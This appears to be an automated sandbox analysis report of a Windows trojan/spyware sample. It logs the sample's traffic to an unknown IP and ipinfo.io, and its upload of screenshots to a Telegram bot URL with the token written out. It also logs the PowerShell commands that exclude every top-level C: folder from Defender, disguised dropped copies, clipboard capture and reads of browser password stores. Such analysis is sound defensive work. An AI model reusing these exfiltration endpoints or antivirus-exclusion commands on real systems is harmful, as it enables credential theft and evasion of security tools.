Source: unknown TCP traffic detected without corresponding DNS query: 5.42.66.51
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.66.51
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.66.51
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.66.51
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.66.51
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.66.51
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.66.51
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.66.51
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.66.51
Source: global traffic HTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2225670983.0000000002ACB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ymail.google.com;example.com;any.domain.net;youtube.com;www.youtube.com;store.steampowered.com;steampowered.com;steam.com; equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: ipinfo.io
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: unknown HTTP traffic detected: POST /bot7829111840:AAGwC163Z3bte6z_YuN643yX5LplCCYUaLM/sendPhoto HTTP/1.1Content-Type: multipart/form-data; boundary="34997188-a42f-41eb-990d-cfd33339eec7"Host: api.telegram.orgContent-Length: 86200Expect: 100-continueConnection: Keep-Alive
Source: powershell.exe, 00000040.00000002.2903448372.00000164CC7BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.mic
Source: powershell.exe, 00000040.00000002.2903448372.00000164CC7BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micft.cMicRosof
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2260842550.000000001D838000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.v
Source: svchost.exe, 0000004F.00000003.2444686605.000001C427480000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000046.00000002.2899814464.0000023F80227000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2286246823.0000018037D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2274378069.000001E800227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2288795317.000001C5B1437000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2317980485.000001F984329000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2302011903.00000239E3AE8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2288980593.0000016E22068000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2322173796.00000232E13F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2301992566.000001FDA2458000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2274595482.0000024700228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2289717560.000001F8D4D18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2303019914.00000251BCF67000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2303795968.00000293B2A48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2225670983.0000000002AD5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2286246823.0000018037B51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2274378069.000001E800001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2288795317.000001C5B1211000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2317980485.000001F984118000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2302011903.00000239E38C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2288980593.0000016E21E41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2322173796.00000232E11D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2301992566.000001FDA2231000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2274595482.0000024700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2289717560.000001F8D4AF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2303019914.00000251BCD41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2303795968.00000293B2821000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.3219775689.000001F6120B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.2886040639.0000018180001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.3511417406.0000016822BD2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003C.00000002.3259951458.0000019354D41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.3268697288.000002A1BE461000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000040.00000002.3495706955.00000164CE721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000042.00000002.3507396549.000001B712461000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.2882983145.000001F700001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.2286246823.0000018037D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2274378069.000001E800227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2288795317.000001C5B1437000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2317980485.000001F984329000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2302011903.00000239E3AE8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2288980593.0000016E22068000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2322173796.00000232E13F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2301992566.000001FDA2458000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2274595482.0000024700228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2289717560.000001F8D4D18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2303019914.00000251BCF67000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2303795968.00000293B2A48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000046.00000002.2899814464.0000023F80227000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2286246823.0000018037B51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2274378069.000001E800001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2288795317.000001C5B1211000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2317980485.000001F984118000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2302011903.00000239E38C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2288980593.0000016E21E41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2322173796.00000232E11D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2301992566.000001FDA2231000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2274595482.0000024700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2289717560.000001F8D4AF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2303019914.00000251BCD41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2303795968.00000293B2821000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.3219775689.000001F6120B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.2886040639.0000018180001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.3511417406.0000016822BD2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003C.00000002.3259951458.0000019354D41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.3268697288.000002A1BE461000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000040.00000002.3495706955.00000164CE721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000042.00000002.3507396549.000001B712461000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.2882983145.000001F700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.2899814464.0000023F8001F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2225670983.0000000002BA0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2225670983.0000000002BA0000.00000004.00000800.00020000.00000000.sdmp, d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2257536514.000000001B322000.00000002.00000001.01000000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2225670983.0000000002BA0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot7829111840:AAGwC163Z3bte6z_YuN643yX5LplCCYUaLM/sendPhoto
Source: svchost.exe, 0000004F.00000003.2444686605.000001C4274F3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 0000004F.00000003.2444686605.000001C427480000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: powershell.exe, 00000046.00000002.2899814464.0000023F80227000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2225670983.0000000002AD5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2225670983.0000000002AD5000.00000004.00000800.00020000.00000000.sdmp, d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2257536514.000000001B322000.00000002.00000001.01000000.00000000.sdmp String found in binary or memory: https://ipinfo.io/country
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2225670983.0000000002AD5000.00000004.00000800.00020000.00000000.sdmp, d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2257536514.000000001B322000.00000002.00000001.01000000.00000000.sdmp String found in binary or memory: https://ipinfo.io/ip
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49706 version: TLS 1.2
Creates a window with clipboard capturing capabilities
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Window created: window name: CLIPBRDWNDCLASS
Too many similar processes found
Source: powershell.exe Process created: 44
Creates files inside the system directory
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Detected potential crypto function
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Code function: 0_2_00007FF848DF0D67 0_2_00007FF848DF0D67
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Code function: 0_2_00007FF848FA074D 0_2_00007FF848FA074D
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Code function: 0_2_00007FF848FA5FF5 0_2_00007FF848FA5FF5
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Code function: 53_2_00007FF848E20D67 53_2_00007FF848E20D67
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\Desktop\ArFrORkS.log 75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
Sample file is different than original file name gathered from version info
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000000.2059603887.0000000000452000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2257666854.000000001B332000.00000002.00000001.01000000.00000000.sdmp Binary or memory string: OriginalFilenameq944h9VdeekiaLj6nIEA0nxdMfYwMGO54 vs d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2257536514.000000001B322000.00000002.00000001.01000000.00000000.sdmp Binary or memory string: OriginalFilenameBzUOsUELloh7lcyuhpXTcoPR5FGxF70O4 vs d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Binary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
Uses 32bit PE files
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, B3txKmJG66b3TvIggSB.cs Cryptographic APIs: 'CreateDecryptor'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, B3txKmJG66b3TvIggSB.cs Cryptographic APIs: 'CreateDecryptor'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, B3txKmJG66b3TvIggSB.cs Cryptographic APIs: 'CreateDecryptor'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, B3txKmJG66b3TvIggSB.cs Cryptographic APIs: 'CreateDecryptor'
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@89/164@2/4
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Program Files (x86)\mozilla maintenance service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Users\user\Desktop\fTGLCVSM.log Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8884:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\db37e7674e0c9c73d718eed222877e169116f5b2c083f00aedc6dc96849528f8
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Users\user\AppData\Local\Temp\ZQ41MPITjV Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zuwFoSPM2u.bat"
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: 0L4O4hE8bk.36.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe ReversingLabs: Detection: 87%
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File read: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe "C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe"
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe "C:\Users\Public\Documents\My Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe"
Source: unknown Process created: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe "C:\Users\Public\Documents\My Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe"
Source: unknown Process created: C:\Users\user\Downloads\smartscreen.exe C:\Users\user\Downloads\smartscreen.exe
Source: unknown Process created: C:\Users\user\Downloads\smartscreen.exe C:\Users\user\Downloads\smartscreen.exe
Source: unknown Process created: C:\Recovery\WmiPrvSE.exe C:\Recovery\WmiPrvSE.exe
Source: unknown Process created: C:\Recovery\WmiPrvSE.exe C:\Recovery\WmiPrvSE.exe
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zuwFoSPM2u.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe "C:\Program Files (x86)\mozilla maintenance service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe"
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
